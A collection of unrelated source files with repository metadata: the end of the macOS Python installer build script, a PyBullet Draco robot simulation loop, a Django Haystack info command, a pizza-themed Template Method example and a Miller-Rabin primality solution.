shellQuote(rootDir)))
print("Running make frameworkinstallextras")
runCommand("make frameworkinstallextras DESTDIR=%s"%(
shellQuote(rootDir)))
del os.environ['DYLD_LIBRARY_PATH']
print("Copying required shared libraries")
if os.path.exists(os.path.join(WORKDIR, 'libraries', 'Library')):
build_lib_dir = os.path.join(
WORKDIR, 'libraries', 'Library', 'Frameworks',
'Python.framework', 'Versions', getVersion(), 'lib')
fw_lib_dir = os.path.join(
WORKDIR, '_root', 'Library', 'Frameworks',
'Python.framework', 'Versions', getVersion(), 'lib')
if internalTk():
# move Tcl and Tk pkgconfig files
runCommand("mv %s/pkgconfig/* %s/pkgconfig"%(
shellQuote(build_lib_dir),
shellQuote(fw_lib_dir) ))
runCommand("rm -r %s/pkgconfig"%(
shellQuote(build_lib_dir), ))
runCommand("mv %s/* %s"%(
shellQuote(build_lib_dir),
shellQuote(fw_lib_dir) ))
frmDir = os.path.join(rootDir, 'Library', 'Frameworks', 'Python.framework')
frmDirVersioned = os.path.join(frmDir, 'Versions', version)
path_to_lib = os.path.join(frmDirVersioned, 'lib', 'python%s'%(version,))
# create directory for OpenSSL certificates
sslDir = os.path.join(frmDirVersioned, 'etc', 'openssl')
os.makedirs(sslDir)
print("Fix file modes")
gid = grp.getgrnam('admin').gr_gid
shared_lib_error = False
for dirpath, dirnames, filenames in os.walk(frmDir):
for dn in dirnames:
os.chmod(os.path.join(dirpath, dn), STAT_0o775)
os.chown(os.path.join(dirpath, dn), -1, gid)
for fn in filenames:
if os.path.islink(fn):
continue
# "chmod g+w $fn"
p = os.path.join(dirpath, fn)
st = os.stat(p)
os.chmod(p, stat.S_IMODE(st.st_mode) | stat.S_IWGRP)
os.chown(p, -1, gid)
if fn in EXPECTED_SHARED_LIBS:
# check to see that this file was linked with the
# expected library path and version
data = captureCommand("otool -L %s" % shellQuote(p))
for sl in EXPECTED_SHARED_LIBS[fn]:
if ("\t%s " % sl) not in data:
print("Expected shared lib %s was not linked with %s"
% (sl, p))
shared_lib_error = True
if shared_lib_error:
fatal("Unexpected shared library errors.")
if PYTHON_3:
LDVERSION=None
VERSION=None
ABIFLAGS=None
fp = open(os.path.join(buildDir, 'Makefile'), 'r')
for ln in fp:
if ln.startswith('VERSION='):
VERSION=ln.split()[1]
if ln.startswith('ABIFLAGS='):
ABIFLAGS=ln.split()[1]
if ln.startswith('LDVERSION='):
LDVERSION=ln.split()[1]
fp.close()
LDVERSION = LDVERSION.replace('$(VERSION)', VERSION)
LDVERSION = LDVERSION.replace('$(ABIFLAGS)', ABIFLAGS)
config_suffix = '-' + LDVERSION
if getVersionMajorMinor() >= (3, 6):
config_suffix = config_suffix + '-darwin'
else:
config_suffix = '' # Python 2.x
# We added some directories to the search path during the configure
# phase. Remove those because those directories won't be there on
    # the end-user's system. Also remove the directories from _sysconfigdata.py
# (added in 3.3) if it exists.
include_path = '-I%s/libraries/usr/local/include' % (WORKDIR,)
lib_path = '-L%s/libraries/usr/local/lib' % (WORKDIR,)
# fix Makefile
path = os.path.join(path_to_lib, 'config' + config_suffix, 'Makefile')
fp = open(path, 'r')
data = fp.read()
fp.close()
for p in (include_path, lib_path):
data = data.replace(" " + p, '')
data = data.replace(p + " ", '')
fp = open(path, 'w')
fp.write(data)
fp.close()
# fix _sysconfigdata
#
# TODO: make this more robust! test_sysconfig_module of
# distutils.tests.test_sysconfig.SysconfigTestCase tests that
# the output from get_config_var in both sysconfig and
# distutils.sysconfig is exactly the same for both CFLAGS and
# LDFLAGS. The fixing up is now complicated by the pretty
# printing in _sysconfigdata.py. Also, we are using the
# pprint from the Python running the installer build which
# may not cosmetically format the same as the pprint in the Python
# being built (and which is used to originally generate
# _sysconfigdata.py).
import pprint
if getVersionMajorMinor() >= (3, 6):
# XXX this is extra-fragile
path = os.path.join(path_to_lib, '_sysconfigdata_m_darwin_darwin.py')
else:
path = os.path.join(path_to_lib, '_sysconfigdata.py')
fp = open(path, 'r')
data = fp.read()
fp.close()
# create build_time_vars dict
exec(data)
vars = {}
for k, v in build_time_vars.items():
if type(v) == type(''):
for p in (include_path, lib_path):
v = v.replace(' ' + p, '')
v = v.replace(p + ' ', '')
vars[k] = v
fp = open(path, 'w')
# duplicated from sysconfig._generate_posix_vars()
fp.write('# system configuration generated and used by'
' the sysconfig module\n')
fp.write('build_time_vars = ')
pprint.pprint(vars, stream=fp)
fp.close()
# Add symlinks in /usr/local/bin, using relative links
usr_local_bin = os.path.join(rootDir, 'usr', 'local', 'bin')
to_framework = os.path.join('..', '..', '..', 'Library', 'Frameworks',
'Python.framework', 'Versions', version, 'bin')
if os.path.exists(usr_local_bin):
shutil.rmtree(usr_local_bin)
os.makedirs(usr_local_bin)
for fn in os.listdir(
os.path.join(frmDir, 'Versions', version, 'bin')):
os.symlink(os.path.join(to_framework, fn),
os.path.join(usr_local_bin, fn))
os.chdir(curdir)
if PYTHON_3:
# Remove the 'Current' link, that way we don't accidentally mess
# with an already installed version of python 2
os.unlink(os.path.join(rootDir, 'Library', 'Frameworks',
'Python.framework', 'Versions', 'Current'))
def patchFile(inPath, outPath):
data = fileContents(inPath)
data = data.replace('$FULL_VERSION', getFullVersion())
data = data.replace('$VERSION', getVersion())
data = data.replace('$MACOSX_DEPLOYMENT_TARGET', ''.join((DEPTARGET, ' or later')))
data = data.replace('$ARCHITECTURES', ", ".join(universal_opts_map[UNIVERSALARCHS]))
data = data.replace('$INSTALL_SIZE', installSize())
data = data.replace('$THIRD_PARTY_LIBS', "\\\n".join(THIRD_PARTY_LIBS))
# This one is not handy as a template variable
data = data.replace('$PYTHONFRAMEWORKINSTALLDIR', '/Library/Frameworks/Python.framework')
fp = open(outPath, 'w')
fp.write(data)
fp.close()
def patchScript(inPath, outPath):
major, minor = getVersionMajorMinor()
data = fileContents(inPath)
data = data.replace('@PYMAJOR@', str(major))
data = data.replace('@PYVER@', getVersion())
fp = open(outPath, 'w')
fp.write(data)
fp.close()
os.chmod(outPath, STAT_0o755)
def packageFromRecipe(targetDir, recipe):
curdir = os.getcwd()
try:
# The major version (such as 2.5) is included in the package name
        # because having two versions of python installed at the same time is
# common.
pkgname = '%s-%s'%(recipe['name'], getVersion())
srcdir = recipe.get('source')
pkgroot = recipe.get('topdir', srcdir)
postflight = recipe.get('postflight')
readme = textwrap.dedent(recipe['readme'])
isRequired = recipe.get('required', True)
print("- building package %s"%(pkgname,))
# Substitute some variables
textvars = dict(
VER=getVersion(),
FULLVER=getFullVersion(),
)
readme = readme % textvars
if pkgroot is not None:
pkgroot = pkgroot % textvars
else:
pkgroot = '/'
if srcdir is not None:
srcdir = os.path.join(WORKDIR, '_root', srcdir[1:])
srcdir = srcdir % textvars
if postflight is not None:
postflight = os.path.abspath(postflight)
packageContents = os.path.join(targetDir, pkgname + '.pkg', 'Contents')
os.makedirs(packageContents)
if srcdir is not None:
os.chdir(srcdir)
runCommand("pax -wf %s . 2>&1"%(shellQuote(os.path.join(packageContents, 'Archive.pax')),))
runCommand("gzip -9 %s 2>&1"%(shellQuote(os.path.join(packageContents, 'Archive.pax')),))
runCommand("mkbom . %s 2>&1"%(shellQuote(os.path.join(packageContents, 'Archive.bom')),))
fn = os.path.join(packageContents, 'PkgInfo')
fp = open(fn, 'w')
fp.write('pmkrpkg1')
fp.close()
rsrcDir = os.path.join(packageContents, "Resources")
os.mkdir(rsrcDir)
fp = open(os.path.join(rsrcDir, 'ReadMe.txt'), 'w')
fp.write(readme)
fp.close()
if postflight is not None:
patchScript(postflight, os.path.join(rsrcDir, 'postflight'))
vers = getFullVersion()
major, minor = getVersionMajorMinor()
pl = Plist(
CFBundleGetInfoString="Python.%s %s"%(pkgname, vers,),
CFBundleIdentifier='org.python.Python.%s'%(pkgname,),
CFBundleName='Python.%s'%(pkgname,),
CFBundleShortVersionString=vers,
IFMajorVersion=major,
IFMinorVersion=minor,
IFPkgFormatVersion=0.10000000149011612,
IFPkgFlagAllowBackRev=False,
IFPkgFlagAuthorizationAction="RootAuthorization",
IFPkgFlagDefaultLocation=pkgroot,
IFPkgFlagFollowLinks=True,
IFPkgFlagInstallFat=True,
IFPkgFlagIsRequired=isRequired,
IFPkgFlagOverwritePermissions=False,
IFPkgFlagRelocatable=False,
IFPkgFlagRestartAction="NoRestart",
IFPkgFlagRootVolumeOnly=True,
IFPkgFlagUpdateInstalledLangauges=False,
)
writePlist(pl, os.path.join(packageContents, 'Info.plist'))
pl = Plist(
IFPkgDescriptionDescription=readme,
IFPkgDescriptionTitle=recipe.get('long_name', "Python.%s"%(pkgname,)),
IFPkgDescriptionVersion=vers,
)
writePlist(pl, os.path.join(packageContents, 'Resources', 'Description.plist'))
finally:
os.chdir(curdir)
def makeMpkgPlist(path):
vers = getFullVersion()
major, minor = getVersionMajorMinor()
pl = Plist(
CFBundleGetInfoString="Python %s"%(vers,),
CFBundleIdentifier='org.python.Python',
CFBundleName='Python',
CFBundleShortVersionString=vers,
IFMajorVersion=major,
IFMinorVersion=minor,
IFPkgFlagComponentDirectory="Contents/Packages",
IFPkgFlagPackageList=[
dict(
IFPkgFlagPackageLocation='%s-%s.pkg'%(item['name'], getVersion()),
IFPkgFlagPackageSelection=item.get('selected', 'selected'),
)
for item in pkg_recipes()
],
IFPkgFormatVersion=0.10000000149011612,
IFPkgFlagBackgroundScaling="proportional",
IFPkgFlagBackgroundAlignment="left",
IFPkgFlagAuthorizationAction="RootAuthorization",
)
writePlist(pl, path)
def buildInstaller():
# Zap all compiled files
for dirpath, _, filenames in os.walk(os.path.join(WORKDIR, '_root')):
for fn in filenames:
if fn.endswith('.pyc') or fn.endswith('.pyo'):
os.unlink(os.path.join(dirpath, fn))
outdir = os.path.join(WORKDIR, 'installer')
if os.path.exists(outdir):
shutil.rmtree(outdir)
os.mkdir(outdir)
pkgroot = os.path.join(outdir, 'Python.mpkg', 'Contents')
pkgcontents = os.path.join(pkgroot, 'Packages')
os.makedirs(pkgcontents)
for recipe in pkg_recipes():
packageFromRecipe(pkgcontents, recipe)
rsrcDir = os.path.join(pkgroot, 'Resources')
fn = os.path.join(pkgroot, 'PkgInfo')
fp = open(fn, 'w')
fp.write('pmkrpkg1')
fp.close()
os.mkdir(rsrcDir)
makeMpkgPlist(os.path.join(pkgroot, 'Info.plist'))
pl = Plist(
IFPkgDescriptionTitle="Python",
IFPkgDescriptionVersion=getVersion(),
)
writePlist(pl, os.path.join(pkgroot, 'Resources', 'Description.plist'))
for fn in os.listdir('resources'):
if fn == '.svn': continue
if fn.endswith('.jpg'):
shutil.copy(os.path.join('resources', fn), os.path.join(rsrcDir, fn))
else:
patchFile(os.path.join('resources', fn), os.path.join(rsrcDir, fn))
def installSize(clear=False, _saved=[]):
if clear:
del _saved[:]
if not _saved:
data = captureCommand("du -ks %s"%(
shellQuote(os.path.join(WORKDIR, '_root'))))
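        # "du -ks" reports the size in kilobytes; the value is rounded to
        # whole megabytes for the installer metadata.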
_saved.append("%d"%((0.5 + (int(data.split()[0]) / 1024.0)),))
return _saved[0]
def buildDMG():
"""
Create DMG containing the rootDir.
"""
outdir = os.path.join(WORKDIR, 'diskimage')
if os.path.exists(outdir):
shutil.rmtree(outdir)
imagepath = os.path.join(outdir,
'python-%s-macosx%s'%(getFullVersion(),DEPTARGET))
if INCLUDE_TIMESTAMP:
imagepath = imagepath + '-%04d-%02d-%02d'%(time.localtime()[:3])
imagepath = imagepath + '.dmg'
os.mkdir(outdir)
# Try to mitigate race condition in certain versions of macOS, e.g. 10.9,
# when hdiutil create fails with "Resource busy". For now, just retry
# the create a few times and hope that it eventually works.
volname='Python %s'%(getFullVersion())
cmd = ("hdiutil create -format UDRW -volname %s -srcfolder %s -size 100m %s"%(
shellQuote(volname),
shellQuote(os.path.join(WORKDIR, 'installer')),
shellQuote(imagepath + ".tmp.dmg" )))
for i in range(5):
fd = os.popen(cmd, 'r')
data = fd.read()
xit = fd.close()
if not xit:
break
sys.stdout.write(data)
print(" -- retrying hdiutil create")
time.sleep(5)
else:
raise RuntimeError("command failed: %s"%(cmd,))
if not os.path.exists(os.path.join(WORKDIR, "mnt")):
os.mkdir(os.path.join(WORKDIR, "mnt"))
runCommand("hdiutil attach %s -mountroot %s"%(
shellQuote(imagepath + ".tmp.dmg"), shellQuote(os.path.join(WORKDIR, "mnt"))))
# Custom icon for the DMG, shown when the DMG is mounted.
shutil.copy("../Icons/Disk Image.icns",
os.path.join(WORKDIR, "mnt", volname, ".VolumeIcon.icns"))
runCommand("SetFile -a C %s/"%(
shellQuote(os.path.join(WORKDIR, "mnt", volname)),))
runCommand("hdiutil detach %s"%(shellQuote(os.path.join(WORKDIR, "mnt", volname))))
setIcon(imagepath + ".tmp.dmg", "../Icons/Disk Image.icns")
runCommand("hdiutil convert %s -format UDZO -o %s"%(
shellQuote(imagepath + ".tmp.dmg"), shellQuote(imagepath)))
setIcon(imagepath, "../Icons/Disk Image.icns")
os.unlink(imagepath + ".tmp.dmg")
return imagepath
def setIcon(filePath, icnsPath):
"""
Set the custom icon for the specified file or directory.
"""
dirPath = os.path.normpath(os.path.dirname(__file__))
toolPath = os.path.join(dirPath, "seticon.app/Contents/MacOS/seticon")
if not os.path.exists(toolPath) or os.stat(toolPath).st_mtime < os.stat(dirPath + '/seticon.m').st_mtime:
# NOTE: The tool is created inside an .app bundle, otherwise it won't work due
# to connections to the window server.
appPath = os.path.join(dirPath, "seticon.app/Contents/MacOS")
if not os.path.exists(appPath):
os.makedirs(appPath)
runCommand("cc -o %s %s/seticon.m -framework Cocoa"%(
shellQuote(toolPath), shellQuote(dirPath)))
runCommand("%s %s %s"%(shellQuote(os.path.abspath(toolPath)), shellQuote(icnsPath),
shellQuote(filePath)))
def main():
# First parse options and check if we can perform our work
parseOptions()
checkEnvironment()
os.environ['MACOSX_DEPLOYMENT_TARGET'] = DEPTARGET
os.environ['CC'] = CC
os.environ['CXX'] = CXX
if os.path.exists(WORKDIR):
shutil.rmtree(WORKDIR)
os.mkdir(WORKDIR)
os.environ['LC_ALL'] = 'C'
# Then build third-party libraries such as sleepycat DB4.
buildLibraries()
# Now build python itself
buildPython()
# And then build the documentation
# Remove the Deployment Target from the shell
# environment, it's no longer needed and
# an unexpected build target can cause problems
# when Sphinx and its dependencies need to
# be (re-)installed.
del os.environ['MACOSX_DEPLOYMENT_TARGET']
buildPythonDocs()
# Prepare the applications folder
folder = os.path.join(WORKDIR, "_root", "Applications", "Python %s"%(
getVersion(),))
fn = os.path.join(folder, "License.rtf")
patchFile("resources/License.rtf", fn)
fn = os.path.join(folder, "ReadMe.rtf")
patchFile("resources/ReadMe.rtf", fn)
fn = os.path.join(folder, "Update Shell Profile.command")
patchScript("scripts/postflight.patch-profile", fn)
fn = os.path.join(folder, "Install Certificates.command")
patchScript("resources/install_certificates.command", fn)
os.chmod(folder, STAT_0o755)
setIcon(folder, "../Icons/Python Folder.icns")
# Create the installer
buildInstaller()
# And copy the readme into the directory containing the installer
patchFile('resources/ReadMe.rtf',
os.path.join(WORKDIR, 'installer', 'ReadMe.rtf'))
# Ditto for the license file.
patchFile('resources/License.rtf',
os.path.join(WORKDIR, 'installer', 'License.rtf'))
fp = open(os.path.join(WORKDIR, 'installer', 'Build.txt'), 'w')
fp.write("# BUILD INFO\n")
fp.write("# Date: %s\n" % time.ctime())
fp.write("# By: %s\n" % pwd.getpwuid(os.getuid()).pw_gecos)
fp.close()
# And copy it to a DMG
buildDMG()
if __name__ == "__main__":
main()
| 37.034793
| 174
| 0.581045
|
c0276c450710abc832fffa6bddf328f70fd648e6
| 9,330
|
py
|
Python
|
simulator/pybullet/fixed_draco_main.py
|
junhyeokahn/PnC
|
388440f7db7b2aedf1e397d0130d806090865c35
|
[
"MIT"
] | 25
|
2019-01-31T13:51:34.000Z
|
2022-02-08T13:19:01.000Z
|
simulator/pybullet/fixed_draco_main.py
|
junhyeokahn/PnC
|
388440f7db7b2aedf1e397d0130d806090865c35
|
[
"MIT"
] | 5
|
2020-06-01T20:48:46.000Z
|
2022-02-08T11:42:02.000Z
|
simulator/pybullet/fixed_draco_main.py
|
junhyeokahn/PnC
|
388440f7db7b2aedf1e397d0130d806090865c35
|
[
"MIT"
] | 9
|
2018-11-20T22:37:50.000Z
|
2021-09-14T17:17:27.000Z
|
import os
import sys
cwd = os.getcwd()
sys.path.append(cwd)
sys.path.append(cwd + '/utils/python_utils')
sys.path.append(cwd + '/simulator/pybullet')
sys.path.append(cwd + '/build/lib')
import time, math
from collections import OrderedDict
import copy
import signal
import shutil
import cv2
import pybullet as p
import numpy as np
np.set_printoptions(precision=2)
from config.fixed_draco.pybullet_simulation import Config
import pybullet_util
import util
import fixed_draco_interface
def set_initial_config(robot, joint_id):
# Upperbody
p.resetJointState(robot, joint_id["l_shoulder_aa"], np.pi / 6, 0.)
p.resetJointState(robot, joint_id["l_elbow_fe"], -np.pi / 2, 0.)
p.resetJointState(robot, joint_id["r_shoulder_aa"], -np.pi / 6, 0.)
p.resetJointState(robot, joint_id["r_elbow_fe"], -np.pi / 2, 0.)
# p.resetJointState(robot, joint_id["l_wrist_ps"], np.pi / 6, 0.)
# p.resetJointState(robot, joint_id["r_wrist_ps"], -np.pi / 6, 0.)
# Lowerbody
hip_yaw_angle = 5
p.resetJointState(robot, joint_id["l_hip_aa"], np.radians(hip_yaw_angle),
0.)
p.resetJointState(robot, joint_id["l_hip_fe"], -np.pi / 4, 0.)
p.resetJointState(robot, joint_id["l_knee_fe_jp"], np.pi / 4, 0.)
p.resetJointState(robot, joint_id["l_knee_fe_jd"], np.pi / 4, 0.)
p.resetJointState(robot, joint_id["l_ankle_fe"], -np.pi / 4, 0.)
p.resetJointState(robot, joint_id["l_ankle_ie"],
np.radians(-hip_yaw_angle), 0.)
p.resetJointState(robot, joint_id["r_hip_aa"], np.radians(-hip_yaw_angle),
0.)
p.resetJointState(robot, joint_id["r_hip_fe"], -np.pi / 4, 0.)
p.resetJointState(robot, joint_id["r_knee_fe_jp"], np.pi / 4, 0.)
p.resetJointState(robot, joint_id["r_knee_fe_jd"], np.pi / 4, 0.)
p.resetJointState(robot, joint_id["r_ankle_fe"], -np.pi / 4, 0.)
p.resetJointState(robot, joint_id["r_ankle_ie"], np.radians(hip_yaw_angle),
0.)
def signal_handler(signal, frame):
if Config.VIDEO_RECORD:
pybullet_util.make_video(video_dir, False)
p.disconnect()
sys.exit(0)
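# Register the handler so that Ctrl-C finalizes the optional video recording
# and disconnects from the simulator before exiting.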
signal.signal(signal.SIGINT, signal_handler)
if __name__ == "__main__":
# Environment Setup
p.connect(p.GUI)
p.resetDebugVisualizerCamera(cameraDistance=1.0,
cameraYaw=120,
cameraPitch=-30,
cameraTargetPosition=[1, 0.5, -0.1])
p.setGravity(0, 0, -9.8)
p.setPhysicsEngineParameter(fixedTimeStep=Config.CONTROLLER_DT,
numSubSteps=Config.N_SUBSTEP)
if Config.VIDEO_RECORD:
video_dir = 'video/draco'
if os.path.exists(video_dir):
shutil.rmtree(video_dir)
os.makedirs(video_dir)
# Create Robot, Ground
p.configureDebugVisualizer(p.COV_ENABLE_RENDERING, 0)
robot = p.loadURDF(cwd + "/robot_model/draco/draco.urdf",
Config.INITIAL_POS_WORLD_TO_BASEJOINT,
Config.INITIAL_QUAT_WORLD_TO_BASEJOINT,
useFixedBase=1)
p.configureDebugVisualizer(p.COV_ENABLE_RENDERING, 1)
nq, nv, na, joint_id, link_id, pos_basejoint_to_basecom, rot_basejoint_to_basecom = pybullet_util.get_robot_config(
robot, Config.INITIAL_POS_WORLD_TO_BASEJOINT,
Config.INITIAL_QUAT_WORLD_TO_BASEJOINT, Config.PRINT_ROBOT_INFO)
# Add Gear constraint
c = p.createConstraint(robot,
link_id['l_knee_fe_lp'],
robot,
link_id['l_knee_fe_ld'],
jointType=p.JOINT_GEAR,
jointAxis=[0, 1, 0],
parentFramePosition=[0, 0, 0],
childFramePosition=[0, 0, 0])
p.changeConstraint(c, gearRatio=-1, maxForce=500, erp=2)
c = p.createConstraint(robot,
link_id['r_knee_fe_lp'],
robot,
link_id['r_knee_fe_ld'],
jointType=p.JOINT_GEAR,
jointAxis=[0, 1, 0],
parentFramePosition=[0, 0, 0],
childFramePosition=[0, 0, 0])
p.changeConstraint(c, gearRatio=-1, maxForce=500, erp=2)
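    # The two JOINT_GEAR constraints above couple each proximal knee link to its
    # distal counterpart with a -1 gear ratio, which appears intended to keep the
    # split knee joints moving together.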
# Initial Config
set_initial_config(robot, joint_id)
# Link Damping
pybullet_util.set_link_damping(robot, link_id.values(), 0., 0.)
# Joint Friction
pybullet_util.set_joint_friction(robot, joint_id, 0.5)
# Construct Interface
interface = fixed_draco_interface.FixedDracoInterface(False)
# interface = fixed_draco_interface.FixedDracoInterface(True)
sensor_data = fixed_draco_interface.FixedDracoSensorData()
command = fixed_draco_interface.FixedDracoCommand()
# Run Sim
t = 0
dt = Config.CONTROLLER_DT
count = 0
jpg_count = 0
nominal_sensor_data = pybullet_util.get_sensor_data(
robot, joint_id, link_id, pos_basejoint_to_basecom,
rot_basejoint_to_basecom)
while (1):
# Get SensorData
if Config.SIMULATE_CAMERA and count % (Config.CAMERA_DT /
Config.CONTROLLER_DT) == 0:
pass
sensor_data_dict = pybullet_util.get_sensor_data(
robot, joint_id, link_id, pos_basejoint_to_basecom,
rot_basejoint_to_basecom)
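        # Foot contact is approximated from geometry: the z-translation of each
        # foot contact link frame is compared against a 5 mm threshold below.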
rf_height = pybullet_util.get_link_iso(robot,
link_id['r_foot_contact'])[2, 3]
lf_height = pybullet_util.get_link_iso(robot,
link_id['l_foot_contact'])[2, 3]
sensor_data_dict[
'b_rf_contact'] = True if rf_height <= 0.005 else False
sensor_data_dict[
'b_lf_contact'] = True if lf_height <= 0.005 else False
sensor_data_dict['imu_frame_iso'] = pybullet_util.get_link_iso(
robot, link_id['torso_imu'])
sensor_data_dict['imu_frame_vel'] = pybullet_util.get_link_vel(
robot, link_id['torso_imu'])
# Get Keyboard Event
keys = p.getKeyboardEvents()
if pybullet_util.is_key_triggered(keys, 'w'):
interface.interrupt.b_interrupt_button_w = True
elif pybullet_util.is_key_triggered(keys, 'x'):
interface.interrupt.b_interrupt_button_x = True
elif pybullet_util.is_key_triggered(keys, 'a'):
interface.interrupt.b_interrupt_button_a = True
elif pybullet_util.is_key_triggered(keys, 's'):
interface.interrupt.b_interrupt_button_s = True
elif pybullet_util.is_key_triggered(keys, 'd'):
interface.interrupt.b_interrupt_button_d = True
elif pybullet_util.is_key_triggered(keys, 'q'):
interface.interrupt.b_interrupt_button_q = True
elif pybullet_util.is_key_triggered(keys, 'e'):
interface.interrupt.b_interrupt_button_e = True
elif pybullet_util.is_key_triggered(keys, 'r'):
interface.interrupt.b_interrupt_button_r = True
# Copy sensor_data_dict
sensor_data.imu_frame_iso = sensor_data_dict['imu_frame_iso']
sensor_data.imu_frame_vel = sensor_data_dict['imu_frame_vel']
sensor_data.joint_positions = sensor_data_dict["joint_pos"]
sensor_data.joint_velocities = sensor_data_dict["joint_vel"]
# Compute Command
if Config.PRINT_TIME:
start_time = time.time()
interface.getCommand(sensor_data, command)
command_joint_positions = copy.deepcopy(command.joint_positions)
command_joint_velocities = copy.deepcopy(command.joint_velocities)
command_joint_torques = copy.deepcopy(command.joint_torques)
if Config.PRINT_TIME:
end_time = time.time()
print("ctrl computation time: ", end_time - start_time)
# Exclude Knee Proximal Joints Command
del command_joint_positions["l_knee_fe_jp"]
del command_joint_positions["r_knee_fe_jp"]
del command_joint_velocities["l_knee_fe_jp"]
del command_joint_velocities["r_knee_fe_jp"]
del command_joint_torques["l_knee_fe_jp"]
del command_joint_torques["r_knee_fe_jp"]
command_dict = dict()
command_dict["joint_pos"] = command_joint_positions
command_dict["joint_vel"] = command_joint_velocities
command_dict["joint_trq"] = command_joint_torques
# Apply Command
# pybullet_util.set_motor_trq(robot, joint_id, command_joint_torques)
pybullet_util.set_motor_impedance(robot, joint_id, command_dict,
Config.KP, Config.KD)
# Save Image
if (Config.VIDEO_RECORD) and (count % Config.RECORD_FREQ == 0):
frame = pybullet_util.get_camera_image([1., 0.5, 1.], 1.0, 120,
-15, 0, 60., 1920, 1080,
0.1, 100.)
frame = frame[:, :, [2, 1, 0]] # << RGB to BGR
filename = video_dir + '/step%06d.jpg' % jpg_count
cv2.imwrite(filename, frame)
jpg_count += 1
p.stepSimulation()
time.sleep(dt)
t += dt
count += 1
| 39.201681
| 119
| 0.622186
|
7746af5020e668189dbc4f76965c292197ec117f
| 753
|
py
|
Python
|
haystack/management/commands/haystack_info.py
|
dulmandakh/django-haystack
|
01c440618a63fa03e05ce9f4d2615e0933f642b1
|
[
"BSD-3-Clause"
] | null | null | null |
haystack/management/commands/haystack_info.py
|
dulmandakh/django-haystack
|
01c440618a63fa03e05ce9f4d2615e0933f642b1
|
[
"BSD-3-Clause"
] | null | null | null |
haystack/management/commands/haystack_info.py
|
dulmandakh/django-haystack
|
01c440618a63fa03e05ce9f4d2615e0933f642b1
|
[
"BSD-3-Clause"
] | null | null | null |
from django.core.management.base import BaseCommand
from haystack import connections
from haystack.constants import DEFAULT_ALIAS
class Command(BaseCommand):
help = "Provides feedback about the current Haystack setup."
def handle(self, **options):
"""Provides feedback about the current Haystack setup."""
unified_index = connections[DEFAULT_ALIAS].get_unified_index()
indexed = unified_index.get_indexed_models()
index_count = len(indexed)
self.stdout.write("Number of handled %s index(es)." % index_count)
for index in indexed:
self.stdout.write(
" - Model: %s by Index: %s"
% (index.__name__, unified_index.get_indexes()[index])
)
| 32.73913
| 74
| 0.662683
|
50d78e7d689e0e4b48a85a1310baab3829ea90b9
| 2,406
|
py
|
Python
|
behavioral/template_method.py
|
MADTeacher/design-patterns
|
8cac737a923f3e3dbfd4c5f38f95eeb74b0ca020
|
[
"MIT"
] | 11
|
2021-07-23T10:10:25.000Z
|
2022-02-09T08:54:16.000Z
|
behavioral/template_method.py
|
MADTeacher/design-patterns
|
8cac737a923f3e3dbfd4c5f38f95eeb74b0ca020
|
[
"MIT"
] | null | null | null |
behavioral/template_method.py
|
MADTeacher/design-patterns
|
8cac737a923f3e3dbfd4c5f38f95eeb74b0ca020
|
[
"MIT"
] | 8
|
2021-03-26T17:57:15.000Z
|
2022-01-03T13:23:42.000Z
|
from abc import ABC, abstractmethod
from typing import List
class Pizza:
"""Класс приготовляемой шеф-поваром пиццы"""
def __init__(self):
self.__state: List[str] = ['base']
def add_ingredient(self, ingredient: str) -> None:
print(f"В пиццу добавлен ингредиент: {ingredient}")
self.__state.append(ingredient)
def __str__(self):
return f"Ингридиенты пиццы: {self.__state}"
class PizzaMaker(ABC):
"""Базовый класс шаблонного метода"""
def make_pizza(self, pizza: Pizza) -> None:
self.prepare_sauce(pizza)
self.prepare_topping(pizza)
self.cook(pizza)
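    # make_pizza is the template method: it fixes the order of the steps, while
    # the concrete makers below override prepare_sauce, prepare_topping and cook.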
@abstractmethod
def prepare_sauce(self, pizza: Pizza) -> None:
...
@abstractmethod
def prepare_topping(self, pizza: Pizza) -> None:
...
@abstractmethod
def cook(self, pizza: Pizza) -> None:
...
class MargaritaMaker(PizzaMaker):
"""Класс приготовления пиццы Маргарита"""
def prepare_sauce(self, pizza: Pizza) -> None:
pizza.add_ingredient('Tomato')
def prepare_topping(self, pizza: Pizza) -> None:
pizza.add_ingredient('Bacon')
pizza.add_ingredient('Mozzarella')
pizza.add_ingredient('Mozzarella')
def cook(self, pizza: Pizza) -> None:
print("Пицца 'Маргарита' будет готова через 10 минут")
class SalamiMaker(PizzaMaker):
"""Класс приготовления пиццы Маргарита"""
def prepare_sauce(self, pizza: Pizza) -> None:
pizza.add_ingredient('Pesto')
def prepare_topping(self, pizza: Pizza) -> None:
pizza.add_ingredient('Salami')
pizza.add_ingredient('Salami')
pizza.add_ingredient('Mozzarella')
def cook(self, pizza: Pizza) -> None:
print("Пицца 'Салями' будет готова через 15 минут")
class Chief:
"""Класс шеф-повара"""
def __init__(self, template_pizza: PizzaMaker):
self.__cook = template_pizza
def set_cook_template(self, template_pizza: PizzaMaker):
self.__cook = template_pizza
def make_pizza(self) -> Pizza:
pizza = Pizza()
self.__cook.make_pizza(pizza)
return pizza
if __name__ == "__main__":
chief = Chief(MargaritaMaker())
print("*"*8 + "Готовим пиццу 'Маргарита'"+8*"*")
print(chief.make_pizza())
print("*" * 8 + "Готовим пиццу 'Салями'" + 8 * "*")
chief.set_cook_template(SalamiMaker())
print(chief.make_pizza())
| 27.655172
| 62
| 0.645054
|
0f8769abbefea0c538bf89f2c6369586e11f0cd8
| 831
|
py
|
Python
|
atcoder/abc/abc149_c.py
|
knuu/competitive-programming
|
16bc68fdaedd6f96ae24310d697585ca8836ab6e
|
[
"MIT"
] | 1
|
2018-11-12T15:18:55.000Z
|
2018-11-12T15:18:55.000Z
|
atcoder/abc/abc149_c.py
|
knuu/competitive-programming
|
16bc68fdaedd6f96ae24310d697585ca8836ab6e
|
[
"MIT"
] | null | null | null |
atcoder/abc/abc149_c.py
|
knuu/competitive-programming
|
16bc68fdaedd6f96ae24310d697585ca8836ab6e
|
[
"MIT"
] | null | null | null |
def miller_rabin(n):
""" primality Test
if n < 3,825,123,056,546,413,051, it is enough to test
a = 2, 3, 5, 7, 11, 13, 17, 19, and 23.
Complexity: O(log^3 n)
"""
assert(n >= 1)
if n == 2:
return True
if n <= 1 or not n & 1:
return False
primes = [2, 3, 5, 7, 11, 13, 17, 19, 23]
d = n - 1
s = 0
while not d & 1:
d >>= 1
s += 1
for prime in primes:
if prime >= n:
continue
x = pow(prime, d, n)
if x == 1:
continue
for r in range(s):
if x == n - 1:
break
if r + 1 == s:
return False
x = x * x % n
return True
X = int(input())
while True:
if miller_rabin(X):
print(X)
break
X += 1
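# Editor's note (not part of the original submission): a quick sanity check for
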